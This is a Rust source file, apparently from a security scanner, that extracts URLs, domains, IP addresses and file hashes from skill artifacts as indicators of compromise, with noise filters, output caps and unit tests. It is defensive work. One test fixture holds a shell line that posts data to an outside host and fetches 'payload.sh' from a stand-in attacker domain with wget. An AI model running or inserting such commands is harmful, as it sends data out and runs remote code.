Skip to main content

skill_veil_core/
ioc_extraction.rs

1//! Pure-offline extraction of URL / domain / IP / file-hash indicators from
2//! skill artifacts. The output feeds downstream enrichment tooling (e.g. the
3//! CLI's VT lookup) without adding any runtime dependency on the network from
4//! inside the core scanner.
5//!
6//! Design principles:
7//! - Deterministic, regex-based, no HTTP.
8//! - Always-on for scanned artifacts — the output is cheap to compute and
9//!   serialises to JSON so consumers can optionally fan it out to
10//!   enrichment services.
11//! - Conservative: only extract what we can recognise structurally; no
12//!   fuzzy inference.
13
14use crate::lazy_pattern;
15use serde::{Deserialize, Serialize};
16use sha2::{Digest, Sha256};
17use std::collections::BTreeSet;
18use std::path::{Path, PathBuf};
19
// Absolute `http://` / `https://` URLs. The part after `://` is 3–512
// characters long and stops at whitespace, quotes, angle brackets,
// backticks, braces, square brackets, parentheses, or a backslash. Because
// `[` is excluded, bracketed IPv6 hosts (`http://[::1]/`) are not captured.
lazy_pattern!(URL_PATTERN, r#"https?://[^\s"'<>`\{\}\[\]\(\)\\]{3,512}"#);
21
// Dotted-quad IPv4 address: four octets in 0–255 (leading zeros such as
// `01` are accepted), delimited by word boundaries on both sides.
lazy_pattern!(
    IPV4_PATTERN,
    r"\b(?:(?:25[0-5]|2[0-4]\d|[01]?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|[01]?\d?\d)\b"
);
26
// IPv6 is loose on purpose: it catches the full 8-group form and
// compressed (`::`) forms. The compressed alternative needs at least
// one hex group on each side of the `::`, so `::1` and `fe80::` are
// not matched. Word boundaries prevent matching inside larger
// hex-colon identifiers (custom UUIDs, opaque tokens) — without
// `\b` the 8-group alternative would gladly match an arbitrary
// `abc1:abc2:abc3:abc4:abc5:abc6:abc7:abc8` substring.
lazy_pattern!(
    IPV6_PATTERN,
    r"\b(?:(?:[A-Fa-f0-9]{1,4}:){1,7}(?::[A-Fa-f0-9]{1,4}){1,7}|(?:[A-Fa-f0-9]{1,4}:){7}[A-Fa-f0-9]{1,4})\b"
);
37
// Standalone host mentions like "sphinx.espuny.net:5000" without a
// scheme. Very conservative to avoid matching filenames / dotted
// identifiers (e.g. `object.method`):
// - the host must end in one of the allow-listed suffixes below (not an
//   arbitrary TLD);
// - at least two labels must precede that suffix, so a bare `foo.com`
//   does not match while `api.foo.com` does;
// - as written, the character classes are lowercase-only.
lazy_pattern!(
    HOST_MENTION_PATTERN,
    r"\b([a-z0-9](?:[a-z0-9\-]{0,61}[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9\-]{0,61}[a-z0-9])?)+\.(?:com|net|org|io|dev|ai|fly\.dev|vercel\.app|co|me|xyz|app|cloud|tech|info|biz|pro|us|uk|de|fr|es|it|ru|cn|jp|hk|tw|kr|sg|in|br|mx|ca|au|nz|za|ae|tr|il|ch|nl|be|se|no|fi|dk|pl|ir|pk|sa|eg|th|vn|ph|id|my|ng))\b"
);
46
/// Collection of IOCs extracted from a single artifact (or package-level
/// aggregate across many artifacts). The string lists produced by
/// `extract_from_text` and `merge` are deduplicated and sorted so
/// downstream cache keys are stable.
#[derive(Debug, Clone, Default, PartialEq, Eq, Serialize, Deserialize)]
pub struct ExtractedIocs {
    /// `http` / `https` URLs, with trailing punctuation trimmed.
    pub urls: Vec<String>,
    /// Host names taken from URLs and from scheme-less host mentions.
    pub domains: Vec<String>,
    /// IPv4 addresses that passed the noise filter.
    pub ipv4: Vec<String>,
    /// IPv6 addresses.
    pub ipv6: Vec<String>,
    /// Path and SHA-256 hex digest of each artifact that was hashed.
    pub file_hashes: Vec<FileHash>,
}
59
/// SHA-256 digest of one hashed artifact together with the path it was
/// extracted under.
#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
pub struct FileHash {
    /// Path supplied by the caller when the artifact was extracted.
    pub path: PathBuf,
    /// Lowercase hex encoding of the SHA-256 digest of the artifact bytes.
    pub sha256: String,
}
65
66impl ExtractedIocs {
67    pub fn is_empty(&self) -> bool {
68        self.urls.is_empty()
69            && self.domains.is_empty()
70            && self.ipv4.is_empty()
71            && self.ipv6.is_empty()
72            && self.file_hashes.is_empty()
73    }
74
75    /// Merge another extraction into `self`, deduplicating inline.
76    pub fn merge(&mut self, other: ExtractedIocs) {
77        fn merge_sorted(target: &mut Vec<String>, additions: Vec<String>) {
78            let mut set: BTreeSet<String> = target.drain(..).collect();
79            set.extend(additions);
80            *target = set.into_iter().collect();
81        }
82        merge_sorted(&mut self.urls, other.urls);
83        merge_sorted(&mut self.domains, other.domains);
84        merge_sorted(&mut self.ipv4, other.ipv4);
85        merge_sorted(&mut self.ipv6, other.ipv6);
86
87        let mut seen: BTreeSet<(PathBuf, String)> = self
88            .file_hashes
89            .drain(..)
90            .map(|h| (h.path, h.sha256))
91            .collect();
92        for h in other.file_hashes {
93            seen.insert((h.path, h.sha256));
94        }
95        self.file_hashes = seen
96            .into_iter()
97            .map(|(path, sha256)| FileHash { path, sha256 })
98            .collect();
99    }
100}
101
/// Domains that must never be reported — localhost variants and
/// documentation/testing names. These otherwise pollute the IOC list and
/// burn enrichment quota.
///
/// `is_noise_domain` compares against these entries exactly (ignoring ASCII
/// case), so subdomains such as `evil.example.com` are still reported.
const NOISE_DOMAINS: &[&str] = &[
    "localhost",
    "localhost.localdomain",
    "example.com",
    "example.org",
    "example.net",
    "test.com",
    "invalid",
];
114
/// String prefixes of IPv4 addresses that `is_noise_ipv4` treats as noise.
/// An address is filtered when it starts with any entry.
const NOISE_IPV4_PREFIXES: &[&str] = &[
    "127.",     // loopback
    "0.0.0.0",  // unspecified (also checked by exact match in `is_noise_ipv4`)
    "10.",      // RFC1918 — common internal, skip noise
    "192.168.", // RFC1918
    "169.254.", // link-local (incl. IMDS — we keep via a separate keep-list)
                // 172.16.0.0/12 (172.16.0.0 – 172.31.255.255) is handled by
                // `is_rfc1918_172` because the second octet has a numeric range that a
                // string prefix cannot express. Using "172.16." here would only match
                // /16, leaving 172.17.x.x (default Docker bridge) through 172.31.x.x
                // unfiltered — those would leak into VT lookups as false-positive IOCs.
];
127
/// IPv4 addresses we deliberately *keep* even though they'd otherwise be
/// filtered as internal — they have threat-intel value. `is_noise_ipv4`
/// consults this list first, before any prefix or range filter.
const KEEP_SPECIAL_IPV4: &[&str] = &[
    "169.254.169.254", // cloud metadata service
];
133
/// Hard upper bound on the number of distinct IOC strings of any single
/// kind (URLs, domains, IPv4, IPv6) extracted from one artifact.
///
/// Mitigates a memory-exhaustion vector where a crafted artifact ships
/// millions of unique URLs / IPs and unbounded sets would grow to several
/// GB before returning. The limit is generous enough that a real package
/// with hundreds of unique IOCs is unaffected; when it is hit, extraction
/// truncates and emits a `tracing::warn` so operators can see that the cap
/// was reached.
pub const MAX_IOCS_PER_KIND_PER_ARTIFACT: usize = 4_096;
143
144/// Extract IOCs from a single artifact's textual content plus its path.
145/// `path` is used for (a) computing the file hash and (b) attaching to the
146/// returned FileHash record.
147pub fn extract_from_artifact(path: &Path, content: &[u8]) -> ExtractedIocs {
148    let mut out = if let Ok(text) = std::str::from_utf8(content) {
149        extract_from_text(text)
150    } else {
151        // Lossy decode so we can still find ASCII IOCs embedded in binaries.
152        let lossy = String::from_utf8_lossy(content);
153        extract_from_text(&lossy)
154    };
155    out.file_hashes.push(FileHash {
156        path: path.to_path_buf(),
157        sha256: sha256_hex(content),
158    });
159    out
160}
161
162/// Extract URL/domain/IP indicators from a string (no file-hash computed).
163///
164/// Each output kind is capped at [`MAX_IOCS_PER_KIND_PER_ARTIFACT`].
165/// Reaching the cap emits a `tracing::warn!` so operators can tell when
166/// truncation occurred. Pre-fix the `BTreeSet`s grew without bound, so
167/// a crafted 50 MB artifact with millions of unique URLs / IPs caused
168/// several-GB heap growth before returning.
169pub fn extract_from_text(text: &str) -> ExtractedIocs {
170    let mut urls: BTreeSet<String> = BTreeSet::new();
171    let mut domains: BTreeSet<String> = BTreeSet::new();
172    let mut ipv4: BTreeSet<String> = BTreeSet::new();
173    let mut ipv6: BTreeSet<String> = BTreeSet::new();
174
175    /// Insert into a bounded IOC set; returns `false` once the set is
176    /// at capacity. Callers stop their inner loop on `false` so they
177    /// do not keep allocating regex matches into a discarded value.
178    fn try_insert_bounded(set: &mut BTreeSet<String>, value: String, kind: &'static str) -> bool {
179        if set.len() >= MAX_IOCS_PER_KIND_PER_ARTIFACT {
180            tracing::warn!(
181                kind,
182                cap = MAX_IOCS_PER_KIND_PER_ARTIFACT,
183                "ioc_extraction: per-artifact IOC cap reached; truncating further matches"
184            );
185            return false;
186        }
187        set.insert(value);
188        true
189    }
190
191    for m in URL_PATTERN.find_matches(text) {
192        let raw = m.matched_text.as_str();
193        let trimmed = raw.trim_end_matches([',', '.', ';', ':', ')', ']', '}', '!', '?']);
194        if !try_insert_bounded(&mut urls, trimmed.to_string(), "url") {
195            break;
196        }
197        if let Some(host) = extract_host_from_url(trimmed) {
198            if !is_noise_domain(&host) && !is_ipv4(&host) && !is_ipv6(&host) {
199                // Domain cap reached: skip insertion but keep scanning URLs.
200                // Check cap before calling try_insert_bounded to avoid
201                // repeated warn! on every URL-domain pair after the cap.
202                if domains.len() < MAX_IOCS_PER_KIND_PER_ARTIFACT {
203                    try_insert_bounded(&mut domains, host, "domain");
204                }
205            }
206        }
207    }
208
209    for m in HOST_MENTION_PATTERN.find_matches(text) {
210        let host = m.matched_text.to_ascii_lowercase();
211        if !is_noise_domain(&host) && !try_insert_bounded(&mut domains, host, "domain") {
212            break;
213        }
214    }
215
216    for m in IPV4_PATTERN.find_matches(text) {
217        let ip = m.matched_text.as_str();
218        if !is_noise_ipv4(ip) && !try_insert_bounded(&mut ipv4, ip.to_string(), "ipv4") {
219            break;
220        }
221    }
222
223    for m in IPV6_PATTERN.find_matches(text) {
224        let ip = m.matched_text;
225        // Mirror `is_ipv6`: require colon-group boundary AND a plausible
226        // IPv6 shape. Without `is_plausible_ipv6` the extractor silently
227        // accepted hex-colon tokens (e.g. 4-group session IDs without `::`
228        // and without 8 groups) that `is_ipv6` would reject — leaking
229        // false-positive IOCs into VT lookups and finding evidence.
230        if ip.matches(':').count() >= 2
231            && is_plausible_ipv6(&ip)
232            && !try_insert_bounded(&mut ipv6, ip, "ipv6")
233        {
234            break;
235        }
236    }
237
238    ExtractedIocs {
239        urls: urls.into_iter().collect(),
240        domains: domains.into_iter().collect(),
241        ipv4: ipv4.into_iter().collect(),
242        ipv6: ipv6.into_iter().collect(),
243        file_hashes: Vec::new(),
244    }
245}
246
/// Return the lowercased host component of `url`, or `None` when the URL
/// has no `://` separator or its host is empty.
///
/// The authority (everything up to the first `/`, `?` or `#`) is isolated
/// *before* userinfo is stripped, so an `@` in the path or query — e.g.
/// `https://medium.com/@user` — is not mistaken for a userinfo delimiter.
/// Within the authority the last `@` separates userinfo from the host. Any
/// `:port` suffix is dropped; for a bracketed IPv6 host the text between
/// `[` and `]` is returned.
fn extract_host_from_url(url: &str) -> Option<String> {
    let (_, after_scheme) = url.split_once("://")?;

    // Cut the authority out first; `@` is legal in paths and queries.
    let authority_end = after_scheme
        .find(['/', '?', '#'])
        .unwrap_or(after_scheme.len());
    let authority = &after_scheme[..authority_end];

    // Userinfo, if present, ends at the last `@` of the authority.
    let host_port = authority
        .rsplit_once('@')
        .map_or(authority, |(_, host_port)| host_port);

    // Strip the port (for IPv6 hosts the port comes after `]`).
    let host = if host_port.starts_with('[') {
        host_port
            .split(']')
            .next()
            .map(|s| s.trim_start_matches('['))
    } else {
        host_port.split(':').next()
    };
    host.map(str::to_ascii_lowercase)
        .filter(|h| !h.is_empty())
}
269
270fn is_noise_domain(domain: &str) -> bool {
271    let d = domain.to_ascii_lowercase();
272    NOISE_DOMAINS.iter().any(|n| d == *n)
273}
274
275fn is_noise_ipv4(ip: &str) -> bool {
276    if KEEP_SPECIAL_IPV4.contains(&ip) {
277        return false;
278    }
279    if ip == "0.0.0.0" {
280        return true;
281    }
282    if NOISE_IPV4_PREFIXES
283        .iter()
284        .any(|prefix| ip.starts_with(prefix))
285    {
286        return true;
287    }
288    is_rfc1918_172(ip)
289}
290
/// Returns `true` for addresses in the RFC1918 block 172.16.0.0/12
/// (172.16.0.0 – 172.31.255.255).
///
/// The range lives in the second octet, which a string prefix cannot
/// describe, so that octet is parsed as a number. This is what keeps
/// 172.17.x.x (the default Docker bridge subnet) through 172.31.x.x out of
/// the IOC list. Only the first two dot-separated fields are inspected.
fn is_rfc1918_172(ip: &str) -> bool {
    let mut octets = ip.split('.');
    match (octets.next(), octets.next()) {
        (Some("172"), Some(second)) => second
            .parse::<u8>()
            .map_or(false, |n| (16..=31).contains(&n)),
        _ => false,
    }
}
307
308fn is_ipv4(s: &str) -> bool {
309    IPV4_PATTERN.is_match(s) && s.matches('.').count() == 3
310}
311
312fn is_ipv6(s: &str) -> bool {
313    s.matches(':').count() >= 2 && IPV6_PATTERN.is_match(s) && is_plausible_ipv6(s)
314}
315
/// Structural sanity check for a string that already looks like IPv6.
///
/// Anything containing `::` is accepted as a compressed address. Without
/// `::`, the string must split on `:` into exactly eight groups, each one to
/// four characters long. This rejects hex-colon tokens (session IDs and the
/// like) that merely resemble an address. Group contents are not checked
/// for hex digits here; that is left to the regex applied by the callers.
fn is_plausible_ipv6(s: &str) -> bool {
    if s.contains("::") {
        return true;
    }

    let mut group_count = 0usize;
    for group in s.split(':') {
        if group.is_empty() || group.len() > 4 {
            return false;
        }
        group_count += 1;
    }
    group_count == 8
}
329
330fn sha256_hex(bytes: &[u8]) -> String {
331    let mut hasher = Sha256::new();
332    hasher.update(bytes);
333    format!("{:x}", hasher.finalize())
334}
335
#[cfg(test)]
mod tests {
    use super::*;

    /// # Contract
    ///
    /// `extract_from_text` MUST cap each IOC kind at
    /// `MAX_IOCS_PER_KIND_PER_ARTIFACT`. Without the cap the `BTreeSet`s
    /// would grow without bound, so a crafted artifact with millions of
    /// unique URLs could cause multi-GB heap growth before returning. The
    /// cap is generous enough that real packages (hundreds of unique IOCs)
    /// are unaffected; we hit it only on synthetic adversarial input.
    #[test]
    fn extract_from_text_caps_url_count_per_artifact() {
        let mut text = String::new();
        // Synthesise more URLs than the cap so we know truncation fires.
        let target = MAX_IOCS_PER_KIND_PER_ARTIFACT + 256;
        for n in 0..target {
            use std::fmt::Write;
            let _ = writeln!(text, "see https://example-{n}.test/ for details");
        }
        let iocs = extract_from_text(&text);
        assert!(
            iocs.urls.len() <= MAX_IOCS_PER_KIND_PER_ARTIFACT,
            "URL set must be capped at {}; got {}",
            MAX_IOCS_PER_KIND_PER_ARTIFACT,
            iocs.urls.len()
        );
    }

    /// URLs in a shell snippet are extracted and their hosts are reported
    /// as domains, with port and path stripped.
    #[test]
    fn extracts_urls_and_domains_from_script() {
        let text = "curl -s -X POST http://sphinx.espuny.net:5000/v1/audio ; wget https://evil.example.com/payload.sh";
        let iocs = extract_from_text(text);
        assert!(iocs
            .urls
            .iter()
            .any(|u| u.starts_with("http://sphinx.espuny.net:5000")));
        assert!(iocs
            .urls
            .iter()
            .any(|u| u.starts_with("https://evil.example.com")));
        assert!(iocs.domains.contains(&"sphinx.espuny.net".to_string()));
        // example.com is noise-filtered; evil.example.com stays.
        assert!(iocs.domains.iter().any(|d| d == "evil.example.com"));
    }

    /// Loopback and RFC1918 addresses are dropped; public addresses and the
    /// cloud metadata address are kept.
    #[test]
    fn filters_loopback_and_private_ips() {
        let text = "target = 127.0.0.1  fallback = 10.0.0.5  router = 192.168.1.1  public = 8.8.8.8  imds = 169.254.169.254";
        let iocs = extract_from_text(text);
        assert!(iocs.ipv4.contains(&"8.8.8.8".to_string()));
        assert!(iocs.ipv4.contains(&"169.254.169.254".to_string())); // IMDS kept
        assert!(!iocs.ipv4.contains(&"127.0.0.1".to_string()));
        assert!(!iocs.ipv4.contains(&"10.0.0.5".to_string()));
        assert!(!iocs.ipv4.contains(&"192.168.1.1".to_string()));
    }

    /// Contract: the RFC1918 172.16.0.0/12 block is fully filtered.
    /// Without `is_rfc1918_172`, a "172.16." string prefix would suppress
    /// only 172.16.x.x, leaving 172.17.x.x – 172.31.x.x (notably the
    /// default Docker bridge subnet) leaking into VT IOCs.
    #[test]
    fn is_noise_ipv4_covers_full_rfc1918_172_12_block() {
        for ip in [
            "172.16.0.1",
            "172.17.0.1", // default Docker bridge
            "172.18.0.42",
            "172.20.5.5",
            "172.31.255.255",
        ] {
            assert!(
                is_noise_ipv4(ip),
                "172.16.0.0/12 must be filtered; failed for {ip}"
            );
        }
        for ip in ["172.15.0.1", "172.32.0.1", "172.0.0.1"] {
            assert!(
                !is_noise_ipv4(ip),
                "{ip} is outside RFC1918 172.16.0.0/12 and must NOT be filtered"
            );
        }
    }

    /// E2E: real text with mixed IOCs proves the integration path
    /// (extraction → filter) honors the /12 contract end-to-end.
    #[test]
    fn extract_filters_full_rfc1918_172_12_block_e2e() {
        let text =
            "docker = 172.17.0.5  internal = 172.20.1.1  public = 9.9.9.9  edge = 172.32.0.1";
        let iocs = extract_from_text(text);
        assert!(!iocs.ipv4.contains(&"172.17.0.5".to_string()));
        assert!(!iocs.ipv4.contains(&"172.20.1.1".to_string()));
        assert!(iocs.ipv4.contains(&"9.9.9.9".to_string()));
        assert!(iocs.ipv4.contains(&"172.32.0.1".to_string()));
    }

    /// Contract: IPv6 extraction MUST require word boundaries. Otherwise
    /// arbitrary 8-group hex-colon identifiers (custom UUIDs, opaque
    /// tokens) embedded in code or logs would surface as IPv6 IOCs.
    #[test]
    fn ipv6_extraction_rejects_unbounded_hex_runs_in_identifiers() {
        let text = "token=xabc1:abc2:abc3:abc4:abc5:abc6:abc7:abc8x more text";
        let iocs = extract_from_text(text);
        assert!(
            iocs.ipv6.is_empty(),
            "IPv6 must NOT match inside identifier word characters; got {:?}",
            iocs.ipv6
        );
    }

    /// Contract: hex-colon tokens that are not real IPv6 MUST NOT be
    /// extracted. A 4-group token like `abc1:def2:1234:5678` (no `::`,
    /// fewer than 8 groups) satisfies the `colons >= 2` heuristic; this
    /// test pins that it never reaches the IOC output, where it would be
    /// shipped to VT as a false positive. The extraction loop applies the
    /// same plausibility gate as `is_ipv6`.
    #[test]
    fn ipv6_extraction_rejects_short_hex_token_lacking_double_colon() {
        let text = "session = abc1:def2:1234:5678 next";
        let iocs = extract_from_text(text);
        assert!(
            iocs.ipv6.is_empty(),
            "4-group hex-colon token without `::` must NOT extract as IPv6; got {:?}",
            iocs.ipv6
        );
    }

    /// Sanity: legitimate IPv6 still extracts. Only the `2001:db8` address
    /// is asserted.
    #[test]
    fn ipv6_extraction_keeps_valid_addresses() {
        let text = "endpoint = 2001:db8::dead:beef:1; alt = fe80::1";
        let iocs = extract_from_text(text);
        assert!(
            iocs.ipv6.iter().any(|i| i.contains("2001:db8")),
            "Valid IPv6 must still match; got {:?}",
            iocs.ipv6
        );
    }

    /// Contract: `is_plausible_ipv6` rejects strings without `::` whose
    /// group structure does not match a strict 8-group form with each
    /// group 1..=4 characters long. Compressed (`::`) forms always pass.
    #[test]
    fn is_plausible_ipv6_rejects_overlong_groups() {
        // 5-char group is invalid in IPv6.
        assert!(!is_plausible_ipv6(
            "aaaaa:bbbb:cccc:dddd:eeee:ffff:1111:2222"
        ));
    }

    /// Any string containing `::` is accepted as a compressed address.
    #[test]
    fn is_plausible_ipv6_accepts_compressed_form() {
        assert!(is_plausible_ipv6("2001:db8::1"));
        assert!(is_plausible_ipv6("fe80::1"));
    }

    /// A full 8-group address with groups of at most four characters passes.
    #[test]
    fn is_plausible_ipv6_accepts_full_8_group_form() {
        assert!(is_plausible_ipv6("2001:0db8:85a3:0000:0000:8a2e:0370:7334"));
    }

    /// `extract_from_artifact` records exactly one file hash, and it is the
    /// lowercase-hex SHA-256 of the raw content.
    #[test]
    fn hashes_artifact_content() {
        let iocs = extract_from_artifact(Path::new("script.sh"), b"hello world");
        assert_eq!(iocs.file_hashes.len(), 1);
        assert_eq!(
            iocs.file_hashes[0].sha256,
            // sha256("hello world")
            "b94d27b9934d3e08a52e52d7da7dabfac484efe37a5380ee9088f7ace2efcde9"
        );
    }

    /// A single compressed IPv6 address in plain text is extracted.
    #[test]
    fn ipv6_basic_extraction() {
        let text = "endpoint = 2001:db8::dead:beef:1";
        let iocs = extract_from_text(text);
        assert!(iocs.ipv6.iter().any(|i| i.contains("2001:db8")));
    }

    /// Repeated indicators collapse to one entry and results come back
    /// sorted.
    #[test]
    fn deduplicates_and_sorts() {
        let text = "https://a.com/x  https://a.com/y  https://a.com/x 8.8.8.8 8.8.4.4 8.8.8.8";
        let iocs = extract_from_text(text);
        assert_eq!(
            iocs.ipv4,
            vec!["8.8.4.4".to_string(), "8.8.8.8".to_string()]
        );
        assert!(iocs.urls.len() >= 2);
    }

    /// Merging two extractions keeps the indicators from both sides.
    #[test]
    fn merge_combines_disjoint_lists() {
        let mut a = extract_from_text("https://foo.com/x 1.1.1.1");
        let b = extract_from_text("https://bar.io/y 8.8.8.8");
        a.merge(b);
        assert!(a.domains.contains(&"foo.com".to_string()));
        assert!(a.domains.contains(&"bar.io".to_string()));
        assert!(a.ipv4.contains(&"1.1.1.1".to_string()));
        assert!(a.ipv4.contains(&"8.8.8.8".to_string()));
    }

    /// Dotted code identifiers must not be reported as host mentions.
    #[test]
    fn does_not_flag_programming_identifiers_as_domains() {
        let text = "object.method.name = func.call() # not a host";
        let iocs = extract_from_text(text);
        assert!(
            iocs.domains.is_empty(),
            "got false-positive: {:?}",
            iocs.domains
        );
    }

    /// # Contract
    ///
    /// When the domain cap is reached, `extract_from_text` MUST NOT emit a
    /// `tracing::warn!` for every further URL-domain pair; on adversarial
    /// inputs with thousands of URLs that would produce thousands of
    /// identical log lines. This test asserts only the resulting set sizes;
    /// it does not capture log output.
    #[test]
    fn domain_cap_does_not_spam_repeated_warns() {
        let mut text = String::new();
        // Generate more unique URL hosts than the per-kind cap allows.
        let target = MAX_IOCS_PER_KIND_PER_ARTIFACT + 100;
        for n in 0..target {
            use std::fmt::Write;
            let _ = writeln!(text, "see https://unique-{n}.example.com/");
        }
        let iocs = extract_from_text(&text);
        assert!(
            iocs.domains.len() <= MAX_IOCS_PER_KIND_PER_ARTIFACT,
            "domain set must be capped at {}; got {}",
            MAX_IOCS_PER_KIND_PER_ARTIFACT,
            iocs.domains.len()
        );
        // The URL set has its own cap, enforced independently.
        assert!(
            iocs.urls.len() <= MAX_IOCS_PER_KIND_PER_ARTIFACT,
            "URL set must also be capped; got {}",
            iocs.urls.len()
        );
    }
}